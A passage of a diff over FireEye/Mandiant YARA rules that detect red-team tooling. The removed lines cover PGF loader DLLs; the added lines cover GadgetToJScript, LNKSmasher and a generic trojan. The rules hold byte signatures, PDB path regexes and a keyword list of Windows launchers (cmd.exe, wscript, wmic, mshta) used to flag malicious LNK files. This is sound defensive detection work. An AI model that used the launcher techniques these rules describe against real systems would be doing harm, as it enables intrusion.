EF D5 63 C7 85 ?? ?? ?? ?? CC FF D5 63 8D 85 ?? ?? ?? ?? 89 28 BA 28 1B D4 63 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 7E 40 D9 63 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 8A 40 D9 63 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 D4 63 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 D4 63 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 } - - condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and any of them -} -rule FIREEYE_RT_APT_Loader_Win32_PGF_2 : FILE -{ - meta: - description = "base dlls: /lib/payload/techniques/dllmain/" - author = "FireEye" - id = "e11a626b-ce91-5f6c-a514-9a8a02a29cbd" - date = "2020-11-25" - date = "2020-11-25" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_2.yar#L4-L19" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "04eb45f8546e052fe348fda2425b058c" - logic_hash = "d69f3f31c4964fe933295563e08bdbb36abadd6611541b9ffa55b6829ced1d21" - score = 75 - quality = 75 - tags = "FILE" - rev = 1 - - strings: - $sb1 = { 6A ?? FF 15 [4-16] 8A ?? 04 [0-16] 8B ?? 1C [0-64] 0F 10 ?? 66 0F EF C8 0F 11 [0-32] 30 [2] 8D [2] 4? 83 [2] 7? } - $sb2 = { 8B ?? 08 [0-16] 6A 40 68 00 30 00 00 5? 6A 00 [0-32] FF 15 [4-32] 5? [0-16] E8 [4-64] C1 ?? 04 [0-32] 8A [2] 3? [2] 4? 3? ?? 24 ?? 7? } - $sb3 = { 8B ?? 3C [0-16] 03 [1-64] 0F B? ?? 14 [0-32] 83 ?? 18 [0-32] 66 3? ?? 06 [4-32] 68 [4] 5? FF 15 [4-16] 85 C0 [2-32] 83 ?? 28 0F B? ?? 06 } - - condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them -} -rule FIREEYE_RT_APT_Loader_Win_PGF_1 : FILE -{ - meta: - description = "PDB string used in some PGF DLL samples" - author = "FireEye" - id = "14e2102c-3572-5314-999c-ff3f6c94de03" - date = "2024-03-04" - modified = "2024-03-04" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win_PGF_1.yar#L4-L17" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Builder_MSIL_G2JS_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "013c7708f1343d684e3571453261b586" - logic_hash = "9dede268d33a38e980026917bd01bc47a72bfe60ba4a999c91eb727a2f377462" + hash = "fa255fdc88ab656ad9bc383f9b322a76" + logic_hash = "487d8e8deef218412f241d99ce32b63bfeb3568d23048b9dd4afff8f401bfea5" score = 75 quality = 73 tags = "FILE" - rev = 6 - - strings: - $pdb1 = /RSDS[\x00-\xFF]{20}c:\\source\\dllconfig-master\\dllsource[\x00-\xFF]{0,500}\.pdb\x00/ nocase - $pdb2 = /RSDS[\x00-\xFF]{20}C:\\Users\\Developer\\Source[\x00-\xFF]{0,500}\\Release\\DllSource\.pdb\x00/ nocase - $pdb3 = /RSDS[\x00-\xFF]{20}q:\\objchk_win7_amd64\\amd64\\init\.pdb\x00/ nocase - - condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and filesize <15MB and any of them -} -rule FIREEYE_RT_APT_Loader_Win32_PGF_1 : FILE -{ - meta: - description = "base dlls: /lib/payload/techniques/unmanaged_exports/" - author = "FireEye" - id = "1af4f2ce-c540-5836-a749-43a0b08609b1" - date = "2020-11-25" - date = "2020-11-25" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_1.yar#L4-L19" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "383161e4deaf7eb2ebeda2c5e9c3204c" - logic_hash = "d3fb0bd7b678b19ee2e0e846f4e13e4ce7e2629ecda123f34ef52f2af42d2a8e" - score = 75 - quality = 75 - tags = "FILE" - rev = 1 - - strings: - $sb1 = { 6A ?? FF 15 [4-32] 8A ?? 04 [0-32] 8B ?? 89 ?? 8B [2] 89 [2] 8B [2] 89 ?? 08 8B [2] 89 [2] 8B [2] 89 [2-64] 8B [5] 83 ?? 01 89 [5] 83 [5-32] 0F B6 [1-2] 0F B6 [1-2] 33 [1-16] 88 ?? EB } - $sb2 = { 6A 40 [0-32] 68 00 30 00 00 [0-32] 6A 00 [0-16] FF 15 [4-32] 89 45 [4-64] E8 [4-32] 83 ?? 01 [4-80] 0F B6 [1-64] 33 [1-32] 88 [2-64] FF ( D? | 55 ) } - $sb3 = { 8B ?? 08 03 ?? 3C [2-32] 0F B? ?? 14 [0-32] 8D [2] 18 [2-64] 0F B? ?? 06 [3-64] 6B ?? 28 } - - condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them -} -rule FIREEYE_RT_APT_Loader_MSIL_PGF_1 : FILE -{ - meta: - description = "base.cs" - author = "FireEye" - id = "39d9821f-86e8-528a-a0a9-287dbe325484" - date = "2020-11-24" - date = "2020-11-24" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_MSIL_PGF_1.yar#L4-L17" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "a495c6d11ff3f525915345fb762f8047" - logic_hash = "4174ed53336f3951d26282dc81b99b2044ac6350d4b4c0074194a9b4acecefee" - score = 75 - quality = 75 - tags = "FILE" - rev = 1 + rev = 2 strings: - $sb1 = { 72 [4] 6F [2] 00 0A 26 [0-16] 0? 6F [2] 00 0A [1-3] 0? 28 [2] 00 0A [0-1] 0? 72 [4-5] 0? 28 [2] 00 0A [0-1] 0? 6F [2] 00 0A 13 ?? 1? 13 ?? 38 [8-16] 91 [3-6] 8E 6? 5D 91 61 D2 9C 11 ?? 1? 58 13 [3-5] 8E 6? 3F } + $typelibguid1 = "AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9" ascii nocase wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 } -rule FIREEYE_RT_APT_Loader_Win64_PGF_2 : FILE +rule FIREEYE_RT_Hunting_Gadgettojscript_1 { meta: - description = "base dlls: /lib/payload/techniques/dllmain/" + description = "This rule is looking for B64 offsets of LazyNetToJscriptLoader which is a namespace specific to the internal version of the GadgetToJScript tooling." author = "FireEye" - id = "5253cb2a-28fd-57ab-be3d-f11cf2ea24cf" - date = "2020-11-25" - date = "2020-11-25" + id = "76c932e0-55b3-56ef-bab6-eb6997b51ee7" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_2.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Hunting_GadgetToJScript_1.yar#L4-L17" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "4326a7e863928ffbb5f6bdf63bb9126e" - logic_hash = "074f6d9ad78ecd4dd8e3d0b5c8b0f61a48374f3935b85c4222305b207b447ec7" - score = 75 + hash = "7af24305a409a2b8f83ece27bb0f7900" + logic_hash = "a880c20e61376dacd4e3a04f2cf065f19067c29371180b1dec186172cadf9564" + score = 50 quality = 75 - tags = "FILE" - rev = 2 + tags = "" + rev = 4 strings: - $sb1 = { B9 [4] FF 15 [4-32] 8B ?? 1C [0-16] 0F B? ?? 04 [0-64] F3 0F 6F 00 [0-64] 66 0F EF C8 [0-64] F3 0F 7F 08 [0-64] 30 ?? 48 8D 40 01 48 83 ?? 01 7? } - $sb2 = { 44 8B ?? 08 [0-32] 41 B8 00 30 00 00 [0-16] FF 15 [4-32] 48 8B C8 [0-16] E8 [4-64] 4D 8D 49 01 [0-32] C1 ?? 04 [0-64] 0F B? [2-16] 41 30 ?? FF 45 3? ?? 7? } - $sb3 = { 63 ?? 3C [0-16] 03 [1-32] 0F B? ?? 14 [0-16] 8D ?? 18 [0-16] 03 [1-16] 66 ?? 3B ?? 06 7? [1-64] 48 8D 15 [4-32] FF 15 [4-16] 85 C0 [2-32] 41 0F B? ?? 06 } + $s1 = "GF6eU5ldFRvSnNjcmlwdExvYWRl" + $s2 = "henlOZXRUb0pzY3JpcHRMb2Fk" + $s3 = "YXp5TmV0VG9Kc2NyaXB0TG9hZGV" condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them + any of them } -rule FIREEYE_RT_APT_Loader_Win64_PGF_1 : FILE +rule FIREEYE_RT_Hunting_LNK_Win_Genericlauncher : FILE { meta: - description = "base dlls: /lib/payload/techniques/unmanaged_exports/" + description = "Signature to detect LNK files or OLE objects with embedded LNK files and generic launcher commands, except powershell which is large enough to have its own gene" author = "FireEye" - id = "1f2280c0-0fdd-5930-947a-931274bccd6f" - date = "2020-11-25" - date = "2020-11-25" + id = "1a12e475-bb18-55ab-b629-47b711c10e6b" + date = "2018-09-04" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_1.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LNKSMASHER/supplemental/yara/Hunting_LNK_Win_GenericLauncher.yar#L4-L22" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "2b686a8b83f8e1d8b455976ae70dab6e" - logic_hash = "2e84d614c34b0b7f93fa70fa3312f22e3ff23f2abd33b2e19c00dd6cba7dcfdc" - score = 75 - quality = 75 + hash = "14dd758e8f89f14612c8df9f862c31e4" + logic_hash = "a654cd3594e2d09950fb11bf8721a5cdb89f5d5be6e706f12e18c7fcdf7dd0fe" + score = 60 + quality = 53 tags = "FILE" - rev = 1 + rev = 7 strings: - $sb1 = { B9 14 00 00 00 FF 15 [4-32] 0F B6 ?? 04 [0-32] F3 A4 [0-64] 0F B6 [2-3] 0F B6 [2-3] 33 [0-32] 88 [1-9] EB } - $sb2 = { 41 B8 00 30 00 00 [0-32] FF 15 [8-64] 83 ?? 01 [4-80] 0F B6 [1-64] 33 [1-32] 88 [1-64] FF ( D? | 5? ) } - $sb3 = { 48 89 4C 24 08 [4-64] 48 63 48 3C [0-32] 48 03 C1 [0-64] 0F B7 48 14 [0-64] 48 8D 44 08 18 [8-64] 0F B7 40 06 [2-32] 48 6B C0 28 } + $a01 = "cmd.exe /" ascii nocase wide + $a02 = "cscript" ascii nocase wide + $a03 = "jscript" ascii nocase wide + $a04 = "wscript" ascii nocase wide + $a05 = "wmic" ascii nocase wide + $a07 = "mshta" ascii nocase wide + $header = { 4C 00 00 00 01 14 02 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them + (($header at 0) or (( uint32(0)==0xE011CFD0) and $header)) and (1 of ($a*)) } -rule FIREEYE_RT_APT_Loader_Win32_PGF_5 : FILE +rule FIREEYE_RT_Dropper_LNK_Lnksmasher_1 : FILE { meta: - description = "PGF payload, generated rule based on symfunc/a86b004b5005c0bcdbd48177b5bac7b8" + description = "The LNKSmasher project contains a prebuilt LNK file that has pieces added based on various configuration items. Because of this, several artifacts are present in every single LNK file generated by LNKSmasher, including the Drive Serial #, the File Droid GUID, and the GUID CLSID." author = "FireEye" - id = "376875f3-00f2-58d0-ae22-7f52ea566da2" + id = "1b93ddf8-9578-5e47-b479-4c9e8a40b4f4" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_5.yar#L4-L18" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LNKSMASHER/production/yara/Dropper_LNK_LNKSmasher_1.yar#L4-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "8c91a27bbdbe9fb0877daccd28bd7bb5" - logic_hash = "dfff615a1d329cf181294f7b0a32c11a21d66ff8a6aa6b9fcd183c9738369623" + hash = "0a86d64c3b25aa45428e94b6e0be3e08" + logic_hash = "61d1ac67ac0d332ad842a522cbebe1b9af1482d58a210b50fb45209355c0aeeb" score = 75 quality = 75 tags = "FILE" - rev = 3 + rev = 6 strings: - $cond1 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 00 30 00 10 33 C5 89 45 E0 56 C7 45 F8 00 00 00 00 C6 85 D8 FE FF FF 00 68 03 01 00 00 6A 00 8D 85 D9 FE FF FF 50 E8 F9 07 00 00 83 C4 0C C7 45 F4 00 00 00 00 C6 45 E7 00 C7 45 E8 00 00 00 00 C7 45 EC 00 00 00 00 C7 45 FC 00 00 00 00 C7 45 F0 00 00 00 00 6A 01 6A 00 8D 8D D8 FE FF FF 51 6A 00 68 9C 10 00 10 8B 15 10 30 00 10 52 E8 31 01 00 00 89 45 F8 6A 14 FF 15 5C 10 00 10 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 C2 0C 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF 00 00 00 00 EB 0F 8B 85 D4 FE FF FF 83 C0 01 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D 1F 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB C9 8B 55 F8 8B 42 08 89 45 FC 6A 40 68 00 30 00 00 8B 4D FC 51 6A 00 FF 15 00 10 00 10 89 45 EC 8B 55 FC 52 8B 45 F8 83 C0 20 50 8B 4D EC 51 E8 F0 06 00 00 83 C4 0C C7 85 D0 FE FF FF 00 00 00 00 EB 0F 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 30 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE 14 00 00 00 F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB B6 8B 4D EC 89 4D F0 FF 55 F0 5E 8B 4D E0 33 CD E8 6D 06 00 00 8B E5 5D C3 } - $cond2 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 00 30 00 10 33 C5 89 45 E0 56 C7 45 F8 00 00 00 00 C6 85 D8 FE FF FF 00 68 03 01 00 00 6A 00 8D 85 D9 FE FF FF 50 E8 F9 07 00 00 83 C4 0C C7 45 F4 00 00 00 00 C6 45 E7 00 C7 45 E8 00 00 00 00 C7 45 EC 00 00 00 00 C7 45 FC 00 00 00 00 C7 45 F0 00 00 00 00 6A 01 6A 00 8D 8D D8 FE FF FF 51 6A 00 68 9C 10 00 10 8B 15 20 33 00 10 52 E8 31 01 00 00 89 45 F8 6A 14 FF 15 58 10 00 10 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 C2 0C 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF 00 00 00 00 EB 0F 8B 85 D4 FE FF FF 83 C0 01 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D 1F 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB C9 8B 55 F8 8B 42 08 89 45 FC 6A 40 68 00 30 00 00 8B 4D FC 51 6A 00 FF 15 2C 10 00 10 89 45 EC 8B 55 FC 52 8B 45 F8 83 C0 20 50 8B 4D EC 51 E8 F0 06 00 00 83 C4 0C C7 85 D0 FE FF FF 00 00 00 00 EB 0F 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 30 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE 14 00 00 00 F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB B6 8B 4D EC 89 4D F0 FF 55 F0 5E 8B 4D E0 33 CD E8 6D 06 00 00 8B E5 5D C3 } - $cond3 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 C7 45 ?? 00 00 00 00 C6 85 ?? ?? ?? ?? 00 68 03 01 00 00 6A 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C C7 45 ?? 00 00 00 00 C6 45 ?? 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 6A 01 6A 00 8D 8D ?? ?? ?? ?? 51 6A 00 68 9C 10 00 10 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 6A 14 FF 15 ?? ?? ?? ?? 83 C4 04 89 45 ?? 8B 45 ?? 8A 48 ?? 88 4D ?? 8B 55 ?? 83 C2 0C 8B 45 ?? 8B 0A 89 08 8B 4A ?? 89 48 ?? 8B 4A ?? 89 48 ?? 8B 4A ?? 89 48 ?? 8B 52 ?? 89 50 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 8B 85 ?? ?? ?? ?? 83 C0 01 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 14 7D ?? 8B 4D ?? 03 8D ?? ?? ?? ?? 0F B6 11 0F B6 45 ?? 33 D0 8B 4D ?? 03 8D ?? ?? ?? ?? 88 11 EB ?? 8B 55 ?? 8B 42 ?? 89 45 ?? 6A 40 68 00 30 00 00 8B 4D ?? 51 6A 00 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 52 8B 45 ?? 83 C0 20 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 0C C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 8B 95 ?? ?? ?? ?? 83 C2 01 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 73 ?? 8B 4D ?? 03 8D ?? ?? ?? ?? 0F B6 09 8B 85 ?? ?? ?? ?? 99 BE 14 00 00 00 F7 FE 8B 45 ?? 0F B6 14 10 33 CA 8B 45 ?? 03 85 ?? ?? ?? ?? 88 08 EB ?? 8B 4D ?? 89 4D ?? FF 55 ?? 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 } - $cond4 = { 8B FF 55 8B EC 81 EC 3? ?1 ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 E0 56 C7 45 F8 ?? ?? ?? ?? C6 85 D8 FE FF FF ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 D9 FE FF FF 50 E8 ?? ?? ?? ?? 83 C4 0C C7 45 F4 ?? ?? ?? ?? C6 45 E7 ?? C7 45 E8 ?? ?? ?? ?? C7 45 EC ?? ?? ?? ?? C7 45 FC ?? ?? ?? ?? C7 45 F? ?? ?? ?? ?0 6A ?? 6A ?? 8D 8D D8 FE FF FF 51 6A ?? 68 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 F8 6A ?? FF ?? ?? ?? ?? ?? 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 ?? ?? 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF ?? ?? ?? ?? EB ?? 8B 85 D4 FE FF FF 83 C? ?1 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D ?? 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB ?? 8B 55 F8 8B 42 08 89 45 FC 6A ?? 68 ?? ?? ?? ?? 8B 4D FC 51 6A ?? FF ?? ?? ?? ?? ?? 89 45 EC 8B 55 FC 52 8B 45 F8 83 ?? ?? 50 8B 4D EC 51 E8 ?? ?? ?? ?? 83 C4 0C C7 85 D0 FE FF FF ?? ?? ?? ?? EB ?? 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 ?? 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE ?? ?? ?? ?? F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB ?? 8B 4D EC 89 4D F0 FF ?? ?? 5E 8B 4D E0 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 } + $drive_serial = { 12 F7 26 BE } + $file_droid_guid = { BC 96 28 4F 0A 46 54 42 81 B8 9F 48 64 D7 E9 A5 } + $guid_clsid = { E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 30 9D } + $header = { 4C 00 00 00 01 14 02 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and any of them + $header at 0 and all of them } -rule FIREEYE_RT_APT_Loader_Win64_PGF_3 : FILE +rule FIREEYE_RT_Trojan_Win64_Generic_23 : FILE { meta: - description = "PGF payload, generated rule based on symfunc/8a2f2236fdfaa3583ab89076025c6269. Identifies dllmain_hook x64 payloads." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "340ea6d4-7111-520c-9bd4-0465a43ea235" - date = "2020-12-09" + id = "470bfeed-e000-58c6-b115-dfa8aea25bef" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_3.yar#L4-L18" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/supplemental/yara/Trojan_Win64_Generic_23.yar#L4-L22" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = 